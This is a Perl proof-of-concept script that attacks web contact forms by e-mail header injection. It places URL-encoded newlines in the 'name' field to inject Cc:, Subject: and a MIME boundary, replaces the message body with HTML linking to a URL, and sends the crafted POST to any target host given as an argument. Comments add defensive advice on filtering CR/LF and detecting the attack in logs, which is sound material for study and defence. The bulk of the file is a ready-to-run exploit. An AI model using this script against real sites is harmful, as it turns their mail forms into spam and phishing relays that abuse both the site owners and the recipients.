#!/usr/bin/perl
# Proof-of-concept for e-mail header injection through a web contact form.
# The form's "name" field is assumed to be copied into an outgoing mail
# header without CR/LF filtering, so URL-encoded newlines (%0A) inside the
# field become additional header lines (Cc:, Subject:, Content-Type:) and a
# MIME boundary that supersedes the form's own message text.
# Defensive takeaways from reading this script: reject or strip CR/LF (raw
# and percent-encoded) from any form field that ends up in a mail header,
# enforce server-side length and format limits on those fields, and treat a
# single form field containing header names or %0A/%0D sequences as a
# detection signal in web logs.
use IO::Socket;

# Positional arguments: target host, script path on that host, and the
# address to inject as a Cc: header.  None of them are validated, and the
# script runs without strict or warnings throughout.
$host = shift;
$uri = shift;
$cc = shift;
$cc =~ s/\@/\%40/g;    # percent-encode '@' so the form handler decodes it back
#print $cc;

# build our fake name with subject and mime header, make sure we fit in 128 bytes
# Each %0A becomes a line break once the server decodes the field; that is
# what turns one header value into several headers.  The trailing "&" ends
# the form field so the next key=value pair can be appended directly.
$name = "t%3Cm%40test.org%3E%0Acc%3A$cc%0A";
$name .= "Subject%3AMe%0A";
$name .= "Content-Type:multipart/mixed;%20boundary=31337;%0AX-t:&";
$name_length = length($name);
# modify this if you think the field is being limited a $name_length chars
if ($name_length gt 128) {
    die "name is too long $name_length\n";
}

# build the new text for our message - sky is the limit! 1024 chars
# since we've built a mime boundary any existing text that the form had will be bypassed by our mime boundary
# The body opens and closes the "31337" boundary declared in $name above,
# so whatever the form itself appends falls outside the MIME structure.
$text = "text=%0A--31337%0AContent-Type:text/html%0A%0A";
$text .= "Be%20sure%20to%20visit%20http%3A//www.mullingsecurity.com";
$text .= "%0A--31337--%0A&";

# you must customize this section
# basically you need to supply all of the post vars that the script requires
# you can get these by looking at the form source
# you may also need to adjust which field you use for your header injection
# in this case $name works but each script is different
#if the contact script validates the to address change the email
# Assemble the application/x-www-form-urlencoded body; Content-Length below
# is computed from this string.
$payload = "email=you%40yourdomain.org&";
$payload .= "name=$name";
$payload .= "text=$text";
$payload .= "Submit=Submit\r\n";
$content_length = length($payload);
#print "Payload has $content_length bytes and $payload\n";

# Hand-built HTTP/1.1 POST.  The request line carries an absolute URI and a
# Proxy-Connection header (proxy-style request), and the header block is
# terminated by a blank line before the body.  To the receiving server this
# is an ordinary browser-looking form submission; only the field contents
# distinguish it from legitimate traffic.
$header = "POST http://$host/$uri HTTP/1.1\n";
$header .= "Host: $host\n";
$header .= "User-Agent: Mozilla/5.0\n";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$header .= "Accept-Language: en-us,en;q=0.5\n";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n";
$header .= "Keep-Alive: 300\n";
$header .= "Proxy-Connection: keep-alive\n";
$header .= "Referer: http://$host\n";
$header .= "Content-Type: application/x-www-form-urlencoded\n";
$header .= "Content-Length: $content_length\n\n";

$head_length = length($header);
$total_bytes = $head_length + $content_length;
print "Sending attack to http://$host/$uri with total of $total_bytes bytes\n";
#print $header;
#print $payload;

# Plain TCP connection to port 80 (no TLS).  Indirect-object constructor
# syntax; the return value is not checked before use.
$sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => '80', Proto => 'tcp', );

# Send the request and echo a copy of it to stdout, then print the raw
# response with line endings stripped.
print $sock $header;
print $header;
print $sock $payload;
print $payload;
flush $sock;
while (<$sock>) {
    chomp;
    print $_;
};
close $sock;
print "Done!\n";